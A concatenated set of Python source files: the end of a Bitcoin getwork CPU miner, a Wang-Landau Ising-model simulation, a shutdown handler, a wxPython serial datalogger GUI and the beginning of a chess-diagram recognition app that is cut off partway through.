static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
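# Illustrative note (added): the getwork 'data' field is 128 bytes,
# hex-encoded as 256 characters; the nonce occupies header bytes 76-80,
# i.e. hex positions 152-160, which is the slice replaced above.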
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2322
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
functions0.py
|
#The MIT License (MIT)
#
#Copyright (c) 2017 Jordan Connor
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
import pandas
import numpy as np
from bokeh.io import show
from bokeh.plotting import figure
from project import lattice
from collections import Counter,defaultdict
from multiprocessing import Process, Pipe
from datetime import datetime
from math import *
QUIT = "QUIT"
class sim_helper(object):
def __init__(self,L,fN,u):
self.L = L
self.u = u
# Set our initial state
self.E1 = None
while self.E1 is None or (self.E1 < self.u[0] or self.E1 >= self.u[1]):
self.lat = lattice.isinglattice(L)
self.E1 = self.lat.E()
#Set the initial f parameter
self.f = np.e
#Define our histogram counter
self.H = Counter()
#Define our density of states and initialize to our guess
self.g0 = np.log(1)
#Define our modification parameter
self.fN = fN
self.G = {self.E1 : self.g0}
def sweep(self):
for i in range(self.L**2):
#Do the trial flip and calculate the new energy
E2 = None
x = None
y = None
x,y = np.random.randint(0,self.L,2)
#self.lat.flip(x,y)
#E2 = self.lat.E()
E2 = self.E1 + self.lat.dU(x, y)
if not (E2 < self.u[0] or E2 >= self.u[1]):
#self.lat.flip(x, y)
#else:
#Accept the energy if it meets the wang landau criterion
#or reverse the flip
if E2 not in self.G.keys():
self.G[E2] = self.g0
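#Wang-Landau acceptance: move to E2 with probability min(1, g(E1)/g(E2));
#G stores ln g, so the ratio is exp(G[E1] - G[E2])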
if(np.random.uniform() <= np.exp(float(self.G[self.E1])-self.G[E2])):
self.E1 = E2
self.lat.flip(x, y)
#else:
#self.lat.flip(x,y)
#update our DOS for the current energy
self.G[self.E1] += np.log(self.f)
#Add our new energy to the histogram
self.H[self.E1] += 1
def clear(self,f):
self.f = f
self.H.clear()
def sim_process(conn):
L,fN,u = conn.recv()
helper = sim_helper(L,fN,u)
while(conn.recv() != "EOF"):
for i in range(10000):
helper.sweep()
conn.send(helper.G)
conn.send(helper.H)
newF = conn.recv()
if(newF != helper.f):
helper.clear(newF)
conn.close()
class wanglandauising(object):
def __init__(self,L,p,fN):
self.L = L
self.p = p
#Define our normalized DOS
self.GN = {}
#Define an nonnormalized DOS
self.G = {}
#Define our modification factors
self.f = np.e
self.fN = fN
self.H = Counter()
self.pCount = 2
self.processes = []
self.conns = []
A = 2*L**2+.06
#self.ranges = [[-A,-A/2.0],[-A/2.0,0],[0,A/2.0],[A/2.0,A]]
#print(self.ranges)
self.ranges = [[-100,0],[0,100]]
#self.ranges=[[-1000,1000]]
def run(self):
for i in range(self.pCount):
parent_conn, child_conn = Pipe()
self.processes.append(Process(target=sim_process, args=(child_conn,)))
self.conns.append(parent_conn)
self.processes[i].start()
self.conns[i].send([self.L,self.fN,self.ranges[i]])
while not self.f < np.exp(10**-8):
for i in range(self.pCount):
self.conns[i].send("GO")
for conn in self.conns:
for e,g in conn.recv().iteritems():
self.G[e] = g
self.H += conn.recv()
self.check_flatness()
for i in range(self.pCount):
self.conns[i].send("EOF")
self.conns[i].close()
self.processes[i].join()
#Normalize our DOS
for e,g in self.G.iteritems():
self.GN[e] = g - self.G[-2] + np.log(2)
#print(self.GN)
def check_flatness(self,a=":)"):
#Determine the average histogram
avgH = 0.0
size = 0.0
for e,count in self.H.iteritems():
avgH += count
size += 1.0
avgH = avgH/size
#Now finish our average and determine our percentage
avgH = avgH*self.p
#Now verify the wanglandau criterion is satisfied
cSat = True
for e,count in self.H.iteritems():
if count <= avgH:
print(str(count) + " " + str(avgH))
cSat = False
break
#If satisfied we reduce our modification factor
if cSat:
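#reduce the modification factor: f -> f**(1/fN), i.e. the usual f -> sqrt(f) when fN == 2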
self.f = self.f**(1/float(self.fN))
self.H.clear()
for conn in self.conns:
conn.send(self.f)
print(self.f)
def u(self,T):
num = 0.0
den = 0.0
for e,g in self.G.iteritems():
num += (e*g*np.exp(-float(e)/T))
den += (g*np.exp(-float(e)/T))
return (num/den)/self.L
if __name__ == '__main__':
#Run the simulation
L = 4
sim = wanglandauising(L,.8,2)
t1 = datetime.now()
sim.run()
t2 = datetime.now()
delta = t2-t1
print(delta.microseconds)
#Now use the DOS to generate our energies for various values of t
U = []
G = []
for e,g in sim.GN.iteritems():
U.append(e)
G.append(g)
s1 = figure(width=500, plot_height=500, title="DOS for " + str(L) + " x " + str(L) + " Ising Model")
s1.circle(U,G,size=5,color="navy",alpha=.5)
s1.xaxis.axis_label = "Energy per Lattice Site"
s1.yaxis.axis_label = "ln(g(e))"
show(s1)
|
shutdown.py
|
import signal
from .Device import listOfDevices
from twisted.internet import reactor
from threading import Thread
import time
def GracefullShutdown(sig, form):
for device in listOfDevices:
device.stop()
t = Thread(target=server_shutdown)
t.start()
def server_shutdown():
time.sleep(0.3)
reactor.stop()
def SetShutdownHandler():
signal.signal(signal.SIGINT, GracefullShutdown)
signal.signal(signal.SIGTERM, GracefullShutdown)
|
Gui.py
|
from threading import Thread, Lock, Event
import time
import serial
import sys
import wx
import sys
import glob
import os
import struct
from csv import writer
import numpy as np
from collections import deque
import serial.tools.list_ports
import numpy as np
import matplotlib as mtp
mtp.use('WxAgg')
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg
from matplotlib.figure import Figure
import matplotlib.animation as manim
from datetime import datetime
look= Lock()
# Global Parametes
stop_threads = False
stop_threads_1 = False
flag_data=False
flag_save= False
analog =0
dato1=0
event = Event()
# ser = serial.Serial()
data_serial = [b'', b'', b'',b'']
# Class for serial Comunication
class Serial_com:
def __init__(self, port, baud):
self.running = 1
self.analog =0
self.dato1=0
self.ser= serial.Serial(port,baud,\
parity=serial.PARITY_NONE,\
stopbits=serial.STOPBITS_ONE,\
bytesize=serial.EIGHTBITS,\
timeout=(0.5))
self.SOH = b'H'
self.STX = b'T'
self.ETX = b'E'
self.flag_data= False
# Thread for reading serial Port
self.t1 = Thread(target = self.loop)
self.t1.start()
self.t2 = Thread(target = self.update)
self.t2.start()
def loop (self):
c=['','','','']
global data_serial
while True:
global stop_threads, data_serial, flag_data, event
if stop_threads:
break
# stop_threads_1= True
# Waiting for serial buffer
if self.ser.inWaiting() > 0:
# a=ser.read_until(ETX,8)
a = self.ser.readline(1)
# Define the start of protocol
if a == self.SOH:
# Read the rest of the protocol
b = self.ser.readline(5)
# if its correct the number of bytes separate data received
if len(b) ==5:
c= struct.unpack('sshs',b)
# use look for blocking changes from other threads
look.acquire()
data_serial =c
if(data_serial[0]==b'R'):
data.save(data_serial[2],0)
# data.axis_data1 = data_serial[2]
# print (data.axis_data1)
if(data_serial[0]==b'B'):
data.save(data_serial[2],1)
look.release()
# flag_data = True
# event.set()
self.ser.close()
def update (self):
i = 0
while True:
global flag_data, event
if stop_threads:
break
if event.is_set():
# print(data.tim)
# print("%d %d",data.axis_data1[-1], data.axis_data2[-1])
frame.value_data1.SetLabel(str(data.axis_data1[-1]))
frame.value_data2.SetLabel(str(data.axis_data2[-1]))
# frame.Refresh()
global flag_save
if(flag_save):
# print('guardar')
data_save=[data.tim ,str(frame.baud_selec),str(data.axis_data1[-1]),str(data.axis_data2[-1])]
print(data_save)
# frame.text_msg.SetLabel('Data 1: '+str(data1) +' Data2: '+str(data2))
append_list_as_row(frame.path_dir,frame.data_rec, data_save)
event.clear()
# look.release()
# flag_data= False
# Lists serial port names
# A list of the serial ports available on the system
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
# Function for save data in CSV file
def append_list_as_row(path,file_name, list_of_elem):
# Open file in append mode
f='csv/'+"\\"+file_name+'.csv'
with open(f, 'a', newline='') as write_obj:
# Create a writer object from csv module
csv_writer = writer(write_obj)
# Add contents of list as last row in the csv file
csv_writer.writerow(list_of_elem)
# Class of GUI
class Screen(wx.Frame):
def __init__(self, parent, title):
super(Screen, self).__init__(parent, title=title)
# wx.Frame.__init__(self, None, -1, name='Name')
# self.Bind(wx.EVT_CLOSE, self.OnClose)
self.port_selec=''
self.baud_selec='115200'
self.choices=[]
self.y_max = 100
self.y_min = 0
self.path_dir = 'C:'
self.data_rec=''
# panel = self
panel = wx.Panel(self, size=(1000,600))
# panel.SetBackgroundColour('#364958')
# panel.SetBackgroundColour('#5B5F97')
panel.SetBackgroundColour('#C0C0C0')
sizer = wx.GridBagSizer(5, 10)
# --------------------------------BOX SERIAL SETTINGS-----------------------------------------------------------
b1 = wx.StaticBox(panel, label="Serial Settings")
b1.SetBackgroundColour('#F1F7EE')
box_serial = wx.StaticBoxSizer(b1, wx.HORIZONTAL)
# BOX TEXT AND PORT OPTIONS
text_port=wx.StaticText(panel, label="Port")
text_port.SetBackgroundColour('#F1F7EE')
box_serial.Add(text_port, flag=wx.LEFT|wx.TOP, border=15)
self.port = wx.ComboBox(panel,value='Choose a port',choices=self.choices)
self.port.Bind(wx.EVT_COMBOBOX_DROPDOWN, self.List_port)
self.port.Bind(wx.EVT_TEXT, self.write_port)
self.port.Bind(wx.EVT_COMBOBOX, self.selec_port)
box_serial.Add(self.port,flag=wx.LEFT|wx.TOP, border=15)
# BOX TEXT AND BAUDRATE OPTIONS
text_baud=wx.StaticText(panel, label="Baudrate")
text_baud.SetBackgroundColour('#F1F7EE')
box_serial.Add(text_baud,flag=wx.LEFT|wx.TOP, border=15)
self.baud =wx.ComboBox(panel,value='115200',choices=['2400','4800','9600','19200','38400','57600','74880'
,'115200','230400', '460800'])
self.baud.Bind(wx.EVT_COMBOBOX, self.selec_baud)
box_serial.Add(self.baud,flag=wx.LEFT|wx.TOP, border=15)
self.connect_button = wx.Button(panel, label='Connect')
self.connect_button.Bind(wx.EVT_BUTTON, self.onConnect)
box_serial.Add(self.connect_button,flag=wx.LEFT|wx.TOP, border=15)
sizer.Add(box_serial, pos=(0, 0), span=(1, 4),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
# --------------------------------------------------------------------------------------------
b3 = wx.StaticBox(panel, label="Real Time Graph")
b3.SetBackgroundColour('#87BBA2')
self.box_plot = wx.StaticBoxSizer(b3, wx.VERTICAL)
self.fig = Figure(figsize=([5.3,4]),tight_layout = {'pad': 2})
self.a = self.fig.add_subplot(111)
# self.lineplot, = self.a.plot([],'ro-', label="Data1",markersize=1, linewidth=1)
# self.lineplot, = self.a.plot([],[],"bo-",label="Data1",markersize=0.5)
# self.lineplot1, = self.a.plot([],[],"ro-",label="Data1",markersize=0.5)
# self.a.legend(loc=1)
# self.a.minorticks_on()
# self.a.grid(which='major', linestyle='-', linewidth='0.5', color='black')
# self.a.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
# Function for realtime plot
self.canvas = FigureCanvasWxAgg(panel, wx.ID_ANY, self.fig)
# self.data_plot = RealtimePlot(axes,self.canvas,fig)
self.box_plot.Add(self.canvas, flag=wx.LEFT|wx.TOP|wx.RIGHT|wx.BOTTOM|wx.EXPAND, border=5)
# sizer.Add(self.canvas,pos=(1, 1), span=(10, 4),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
sizer.Add(self.box_plot, pos=(1, 0), span=(3, 5),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
self._plot = RealtimePlot(self.a, self.canvas, self.fig)
# ----------------------BOX RECORD SETTINGS---------------------------------------------------
b2 = wx.StaticBox(panel, label="Record / Export")
b2.SetBackgroundColour('#F1F7EE')
self.box_rec = wx.StaticBoxSizer(b2, wx.HORIZONTAL)
# BUTTON BROWSER
self.text_port=wx.StaticText(panel, label="Path")
self.text_port.SetBackgroundColour('#F1F7EE')
self.box_rec.Add(self.text_port, flag=wx.LEFT|wx.TOP, border=15)
# self.path = wx.TextCtrl(panel,value=os.path.abspath(os.getcwd())+'\csv',size=wx.Size(200,15))
# self.box_rec.Add(self.path, flag=wx.LEFT|wx.TOP|wx.EXPAND,border=15)
# self.browser_button= wx.Button(panel,label="Browser")
# self.browser_button.Bind(wx.EVT_BUTTON, self.onDir)
# self.box_rec.Add(self.browser_button, flag=wx.LEFT|wx.TOP, border=15)
# BUTTON REC
self.rec_button= wx.Button(panel,label="REC",)
self.rec_button.Bind(wx.EVT_BUTTON, self.onRec)
self.box_rec.Add(self.rec_button, flag=wx.LEFT|wx.TOP, border=15)
sizer.Add(self.box_rec, pos=(0, 4), span=(1, 4),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
line = wx.StaticLine(panel)
# -------------------- CURRENT SETTINGS -----------------------------------------------------
b4 = wx.StaticBox(panel,label="Current Value")
b4.SetBackgroundColour('#87BBA2')
# b4.SetBackgroundColour('#143642')
self.box_data = wx.StaticBoxSizer(b4, wx.VERTICAL)
text_data1=wx.StaticText(panel, label="Analogue Data 1")
text_data1.SetBackgroundColour('#364958')
text_data1.SetForegroundColour('#F1F7EE')
text_data1.SetFont(wx.Font(18, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(text_data1, flag=wx.LEFT|wx.TOP, border=15)
self.value_data1=wx.StaticText(panel, label="00")
self.value_data1.SetBackgroundColour('#F1F7EE')
self.value_data1.SetFont(wx.Font(40, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(self.value_data1, flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER , border=15)
text_data1=wx.StaticText(panel, label="Analogue Data 2")
text_data1.SetBackgroundColour('#364958')
text_data1.SetForegroundColour('#F1F7EE')
text_data1.SetFont(wx.Font(18, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(text_data1, flag=wx.LEFT|wx.TOP, border=15)
self.value_data2=wx.StaticText(panel, label="00")
self.value_data2.SetBackgroundColour('#F1F7EE')
self.value_data2.SetFont(wx.Font(40, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(self.value_data2, flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=15)
sizer.Add(self.box_data, pos=(1,5), span=(2, 3),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
# -------------------- GRAPH SETTINGS -----------------------------------------------------
b5 = wx.StaticBox(panel,label="Graph Settings")
b5.SetBackgroundColour('#F1F7EE')
text_max=wx.StaticText(panel, label="Y-Limit Max")
text_max.SetBackgroundColour('#F1F7EE')
text_max.SetFont(wx.Font(10, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.Limit_max = wx.SpinCtrl(panel, value="100" , min=0, max=100, initial=100)
# self.Limit_max = wx.TextCtrl(panel,value='100', size=wx.Size(40,20))
# self.Limit_max.Bind(wx.EVT_TEXT, self.Set_Limit)
text_min=wx.StaticText(panel, label="Y-Limit Max")
text_min.SetBackgroundColour('#F1F7EE')
text_min.SetFont(wx.Font(10, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.Limit_min = wx.SpinCtrl(panel, value="0" , min=0, max=100, initial=0)
# self.Limit_min = wx.TextCtrl(panel,value='0', size=wx.Size(40,20))
# self.Limit_min.Bind(wx.EVT_TEXT,self.Set_Limit)
self.box_princ= wx.StaticBoxSizer(b5,wx.VERTICAL)
self.box_param = wx.BoxSizer(wx.HORIZONTAL)
self.box_min = wx.BoxSizer( wx.HORIZONTAL)
self.box_param.Add(text_max, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_param.Add(self.Limit_max, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_min.Add(text_min, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_min.Add(self.Limit_min, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_princ.Add(self.box_param,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=5)
self.box_princ.Add(self.box_min,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=5)
self.set_button= wx.Button(panel,label="SET")
self.set_button.Bind(wx.EVT_BUTTON, self.Set_Limit)
self.box_princ.Add(self.set_button,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=5)
sizer.Add(self.box_princ, pos=(3,5), span=(1, 3),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT|wx.BOTTOM , border=10)
# -------------------- MESSAGE SETTINGS -----------------------------------------------------
b6 = wx.StaticBox(panel,label="Messages")
b6.SetBackgroundColour('#F1F7EE')
self.box_msg = wx.StaticBoxSizer(b6, wx.HORIZONTAL)
text_1 = wx.StaticText(panel, label="Serial Comunication: ")
text_1.SetBackgroundColour('#F1F7EE')
text_1.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(text_1,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
self.ser_msg=wx.StaticText(panel, label="Close", size=wx.Size(150,18))
self.ser_msg.SetBackgroundColour('#F1F7EE')
self.ser_msg.SetForegroundColour('#364958')
self.ser_msg.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(self.ser_msg,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
text_2 = wx.StaticText(panel, label="Recording Data: ")
text_2.SetBackgroundColour('#F1F7EE')
text_2.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(text_2,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
self.text_msg=wx.StaticText(panel, label=" Stop", size=wx.Size(150,18))
self.text_msg.SetBackgroundColour('#F1F7EE')
self.text_msg.SetForegroundColour('#3B6064')
self.text_msg.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(self.text_msg,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
sizer.Add(self.box_msg, pos=(4,0), span=(1, 8),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT|wx.BOTTOM , border=10)
sizer.AddGrowableCol(2)
panel.SetSizer(sizer)
sizer.Fit(self)
self.Center()
self.Show(True)
#------------------------------------------------------------------------------------------------
def onRec(self,event):
# ------------ Function for export data
# print('rec')
# print(self.rec_button.Label)
if self.rec_button.Label=='REC':
print('rec')
# self.path_dir = os.path.abspath(os.getcwd())
self.data_rec = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
self.text_msg.SetLabel('Exporting file ...'+ self.data_rec+'.csv')
# f=self.path_dir+"\\"+self.data_rec+'.csv'
f='csv/'+self.data_rec+'.csv'
print(self.path_dir)
# Create CSV file
with open(f, 'w') as write_obj:
# Create a writer object from csv module
csv_writer = writer(write_obj)
# Add header to the csv file
csv_writer.writerow(['Date Time','Baudrate','Data analog1','Data analog2'])
global flag_save
flag_save = True
self.rec_button.SetLabel('STOP')
else:
self.text_msg.SetLabel('Stop')
self.rec_button.SetLabel('REC')
flag_save = False
# List COM availables
def List_port(self,event):
# print(serial_ports)
ports = list(serial.tools.list_ports.comports())
lst = []
for p in ports:
print (type(p.device))
lst.append(p.device)
self.choices=lst
self.port.SetItems(self.choices)
print(ports)
# Get de Baudrate selected
def selec_baud(self,event):
self.baud_selec=self.baud.GetStringSelection()
print(self.baud_selec)
# Get Port Selected or writer
def selec_port(self,event):
self.port_selec =self.port.GetStringSelection()
print(self.port.GetStringSelection())
def write_port(self,event):
self.port_selec = self.port.GetValue()
# Open System Directory to choose a folder
def onDir(self, event):
"""
Show the DirDialog and print the user's choice
"""
dlg = wx.DirDialog(self, "Choose a directory:",
style=wx.DD_DEFAULT_STYLE
#| wx.DD_DIR_MUST_EXIST
#| wx.DD_CHANGE_DIR
)
if dlg.ShowModal() == wx.ID_OK:
print ("You chose %s" % dlg.GetPath())
self.path.SetValue(dlg.GetPath())
self.path_dir = dlg.GetPath()
dlg.Destroy()
# Start thread of Serial Communication
def onConnect(self, event):
global stop_threads
global stop_threads_1
# global ser
print('port: '+ self.port_selec +'Baud: '+self.baud_selec)
if self.connect_button.Label=='Connect':
if(self.port_selec == '' or self.port_selec == 'Choose a port'):
wx.MessageBox(message=" Choose a Port", caption= "Warning")
else:
self.connect_button.SetLabel('Disconnect')
stop_threads = False
stop_threads_1 = False
print('Start')
self.Serial=Serial_com(self.port_selec,self.baud_selec)
# wx.MessageBox(message=" Connection Started", caption= "Connect")
self.ser_msg.SetLabel("Open")
self.port.Disable()
self.baud.Disable()
else:
self.connect_button.SetLabel('Connect')
stop_threads = True
# stop_threads_1 = True
# wx.MessageBox(message=" Connection Ended", caption= "Disconnect")
self.ser_msg.SetLabel("Close")
# self.Serial.endApplication()
self.port.Enable()
self.baud.Enable()
# Reset Plot Limits
def Set_Limit(self,event):
self.y_max= int(self.Limit_max.GetValue())
self.y_min= int(self.Limit_min.GetValue())
self._plot.y_max = self.y_max
self._plot.y_min = self.y_min
# print(self.y_max)
# print(self.y_min)
# Stop all threads
def OnClose(self, event):
global stop_threads, stop_threads_1
# signal the worker threads to exit their loops; Thread has no public stop
# method, so the shared flags are used instead of the private _stop()
stop_threads = True
stop_threads_1 = True
# self.animator.event_source.stop()
self.Destroy()
# Class for save data received and create arrays for plotting
class DataPlot:
def __init__(self, max_entries = 60):
self.axis_t = deque([0],maxlen=max_entries)
self.axis_data1 = deque([0],maxlen=max_entries)
self.axis_data2 = deque([0],maxlen=max_entries)
self.tim = 0
self.data = [0, 0]
self.data_save=[]
self.max_entries = max_entries
self.count=0
# function for save data for plotting, save data in CSV and update current value
def save_all(self,data1,data2):
self.tim=datetime.now().strftime('%Y %m %d %H:%M:%S')
######## DATA1 ##########################
self.axis_t.append(datetime.now().strftime('%H:%M:%S'))
# print(self.axis_t)
self.axis_data1.append(data1)
# print(self.axis_data1)
######## DATA2 ##############
self.axis_data2.append(data2)
# print(self.axis_data2)
# frame.plot_data(data.axis_data1,data.axis_t)
# Wait for get two data form serial before save
def save (self,a,i):
self.count=self.count+1
self.data[i]=a
if(self.count==2):
# print(self.data)
self.save_all(self.data[0],self.data[1])
self.count=0
global event
event.set()
class RealtimePlot:
def __init__(self, a,canvas, fig):
self.y_min = 0
self.y_max = 100
# -------------------- PLOT SETTINGS -----------------------------------------------------
self.a = a
self.canvas = canvas
self.fig = fig
self.lineplot, = self.a.plot([],[],'ro-', label="Data1",markersize=1, linewidth=1)
self.lineplot1, = self.a.plot( [],[],'bo-', label="Data2",markersize=1,linewidth=1)
self.a.legend(loc=1)
self.a.minorticks_on()
self.a.grid(which='major', linestyle='-', linewidth='0.5', color='black')
self.a.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
self.fig.canvas.draw()
self.t3= Thread(target = self.loop)
self.t3.start()
# Plotting Real timeF
def loop (self):
while True:
global stop_threads_1, event
if stop_threads_1:
break
# print(data.axis_data1)
# print(data.axis_data2)
self.anim()
time.sleep(0.5)
def anim (self):
# self.a.clear()
self.a.set_xticklabels(data.axis_t, fontsize=8)
self.a.set_ylim([self.y_min , self.y_max ])
# print(self.y_min,self.y_max)
y=np.arange(self.y_min, self.y_max+5,10)
self.a.set_yticks(y)
# self.a.set_yticklabels(y, fontsize=8)
self.a.autoscale_view(True)
self.a.relim()
# self.a.plot(list(range(len(data.axis_data1))),data.axis_data1,'ro-', label="Data1",markersize=1, linewidth=1)
# self.a.plot(list(range(len(data.axis_data2))),data.axis_data2,'bo-', label="Data2",markersize=1,linewidth=1) # self.a.plot(list(range(len(data.axis_data1))),data.axis_data1,'ro-', label="Data1",markersize=1, linewidth=1)
self.lineplot.set_data(np.arange(0,len(data.axis_data1),1),np.array(data.axis_data1))
self.lineplot1.set_data(np.arange(0,len(data.axis_data2),1),np.array(data.axis_data2))
# self.a.legend(loc=1)
# self.a.minorticks_on()
# self.a.grid(which='major', linestyle='-', linewidth='0.5', color='black')
# self.a.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
self.fig.canvas.draw()
# self.fig.canvas.draw_idle()
if __name__ == '__main__':
# object for save data
data = DataPlot()
# GUI panel
app = wx.App(False)
frame = Screen(None, 'Datalogger')
# Main loop for GUI
app.MainLoop()
|
Application.py
|
################################################################################
# Main application
################################################################################
import queue
import threading
from os.path import abspath, dirname, join
import tkinter as tk
from PIL import Image, ImageTk, ImageOps, UnidentifiedImageError
import cv2 as cv
import numpy as np
import tensorflow as tf
from tensorflow import keras
import sys
sys.path.insert(0, join(abspath(dirname(__file__)), "../tools"))
from detection import get_diagram_position
from relative_to_absolute_path import get_absolute_path
from diagrams_to_squares import get_squares
################################################################################
################################################################################
def load_pieces() -> dict:
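# Class indices produced by the square classifiers, mapped to piece images
# (inferred from the file names): 1-6 = black P, R, N, B, Q, K and
# 7-12 = white P, R, N, B, Q, K.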
return {
4: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bB.png", __file__)).resize((70, 70))
),
6: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bK.png", __file__)).resize((70, 70))
),
3: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bN.png", __file__)).resize((70, 70))
),
1: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bP.png", __file__)).resize((70, 70))
),
5: ImageTk.PhotoImage(
